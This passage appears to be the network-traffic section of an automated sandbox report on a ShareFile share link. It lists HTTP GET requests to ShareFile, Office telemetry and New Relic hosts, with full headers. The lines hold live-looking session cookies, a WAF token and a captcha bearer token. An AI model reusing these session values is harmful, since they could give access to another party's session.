AWSALB=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf; AWSALBCORS=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/22a601d65471e8503ea9.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALBTGCORS=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALB=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf; AWSALBCORS=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/ba7dfd1a6326f1b75478.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALBTGCORS=/ZHn9jraXwjXh4cJHxFvHI12Bz0R26u1RcFCs7qbho8G+HhxsM4QvFOyHf667geRWpflI03Ns0d8eZ5RxkclW4+a8n2FUu/uAg3DZM2ZHQSQ4KVwlp6xdoGBFbJt0Eyqi0GigRs/TIlSoV6/cv+t/ynW3Y+7ht3RG7aykME9870a; AWSALB=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf; AWSALBCORS=B0ej6jhjeaOZ64OKJXO/8+uLtqnYvt8+fa9tLxKZDfo8ptJ0ZM0xSAyAse+wMQy+P4yvnJl2kbwaHiY3qRixhFVuePNMtA3npzTbyBWOJqAQI827AlHD7CVXTnIf
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/22a601d65471e8503ea9.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=/q5rjCNhW+9a7NuPVCKKSaYLWC6zuhqqOKfBYXIRKBPaw6i7EnDohXLnisi8tLRgBaPCaiwLd3MAXud7Y+ui14auqEdku/mPAErRBuuBhstXZ1KFcdWZd0jozR91O+ib9r0O6tp/cKp7glXIHU5iUjUYK9eLWNHs1gK3ysXw1ppz; AWSALBTGCORS=/q5rjCNhW+9a7NuPVCKKSaYLWC6zuhqqOKfBYXIRKBPaw6i7EnDohXLnisi8tLRgBaPCaiwLd3MAXud7Y+ui14auqEdku/mPAErRBuuBhstXZ1KFcdWZd0jozR91O+ib9r0O6tp/cKp7glXIHU5iUjUYK9eLWNHs1gK3ysXw1ppz; AWSALB=rrTuw6/oqT7Xm6D7tsKWAaUxo0qhDkIVLVOik0bBRiXGVY1ABmvZlIh8/GcOnePGEXaWQoWZe7/E4KgTULsP+WvEFGAjLpfg4cDSQf/wyBFXWeTtI9RN3wa9T4q5; AWSALBCORS=rrTuw6/oqT7Xm6D7tsKWAaUxo0qhDkIVLVOik0bBRiXGVY1ABmvZlIh8/GcOnePGEXaWQoWZe7/E4KgTULsP+WvEFGAjLpfg4cDSQf/wyBFXWeTtI9RN3wa9T4q5
            Source: global trafficHTTP traffic detected: GET /bundles/2efeefafc2bb68a97d33.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALBTGCORS=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALB=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe; AWSALBCORS=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe
            Source: global trafficHTTP traffic detected: GET /bundles/d178f6eceb0126b1e292.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALBTGCORS=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALB=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe; AWSALBCORS=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe
            Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/b5bef5c91ec3b83469e0.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALBTGCORS=QUQvIbVeWjiFlpi70ysb8GkGYjm8gn0/5gvEut++VDoo2k/ukNLM/wKUlmtrrXO5MXkVxkNY+hxDaniLePO65kkGeX2FsoEuM7DHVvW27L26JN41JivV3wMaHE/nZx09SszBOaKK5t9RFdx+DpAqTqPd7whAitwg9zNHOdUSeP8S; AWSALB=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe; AWSALBCORS=sAemaIBnNVPjbc1t1Yc6Spg9PMbtkZFdW8rB/68ztzjVa8rtuknd+mgJ5/9krGicMtd/91sJtiqJIUzcQf2Q8yFWnaayo/8eKPKLRkCtVAqxAZv9IN/0WqHPyASe
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/d8fcf3851ba79b1d138a.woff2 HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=36323&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=35f95be610a6cff2
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sf/v3/Shares(189361297164461c)/Items(st31ee83-7bff-445d-8b76-231696d63572)/ProtocolLinks(Web)?action=View HTTP/1.1Host: premierbb.sf-api.comConnection: keep-aliveCorrelationId: rvP6A1DCHKusGEInl8WFmwsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0Authorization: Captcha eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJTdGF0ZSI6InMwNjVhMjMwNDBmZTQ0MzQ0ODYwZjZkMWRkNTgxMGE1MiIsIkV4cGlyZXMiOjE3Mjg0OTg5MzR9.Y4AJ6PQtgj2M2hRvc6eXJhhxLt4TdW-c4HGWWZb80FYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=/1sLx+WFi8qCXjY7fp01c6IWLH/QaDpH6zhAoTyAVTS3qYoPE2Fj+3hiswQIcrjDdmVKiRwaLUmlS83hmzWBQGKn/SH6V6lxSwIVE51GDd1RZ0bWq8vQSs2YeDdnAOWY+NCc/Uxc6ZeihwGq0+8ljGgYL4qRqE8tARx9az4NRJ+e; AWSALBCORS=j2hBEYCKBMRxcB/4e1moxSRiflSj/VGGA4eRDyb3xDP5xKTxakKaInih+XdpVjQ6XIUhiihcXf/aH3uECQ7Z8I+WBap2toLAez0Ij2YnEIubjYuQHXSG5l6cQUrH
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/2c61db7618456a4b4ea2.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALBTGCORS=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALB=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW; AWSALBCORS=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /bundles/d5a7899d41651404accd.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALBTGCORS=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALB=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW; AWSALBCORS=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW
            Source: global trafficHTTP traffic detected: GET /bundles/102a12cf4db82175eb4a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/share/view/189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=e96a2a16-7e3c-4b99-96e2-f45ab76b2885:EQoAc9l+wdRaAAAA:/zpzslzW74rRLa3+zDOmw9rkfwXqxw3hg+C0B6RR1rwP+TFlS+j/rN6T5YAqeSFtuKBv64TmcZxw+FB4DvYzSE9F/nCN9xkaReQU6+4e1XKoYVzylG+ZEFjO3lBhFfQa5LcjyT/OTFbgqwxbY7ud+FaudFZjJcnCD/zRD8M7TjDIDBCHkaF+EZItW62z8QtlNJ1YsFG6u2rH+9Bg9h1j5y6EC730H93gxv6EHbOFGWN4RaHfN37zY0efjlP3JFIT; AWSALBTG=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALBTGCORS=P5/BAhocDG7YZ07NUWP6RJ+ia/hUnQwcih6r7RZAjDcfaJkkLXCGVxaou2TzOQzQqSko7os3YNNeLvYh4WiULTGKr3UTFehXydDFA7qPNn+4sTCpnHH3BuCa3mSZgwNPud9XkldWPbi17vcG5boFs4FsfZjuR/aksZ/6KNK6j4Ti; AWSALB=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW; AWSALBCORS=GSapZedxsBlhh+vK8zV7Bk121/gWDWHUuiVdY4RQ+SeZjcQCZcr+OoW3ssQ9zxoKeAI0WsnA6VLtJkACUxx5p1HDcLPPfS0MSPcTAED+OYPEQ+IMt5zA2QcdasyW
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
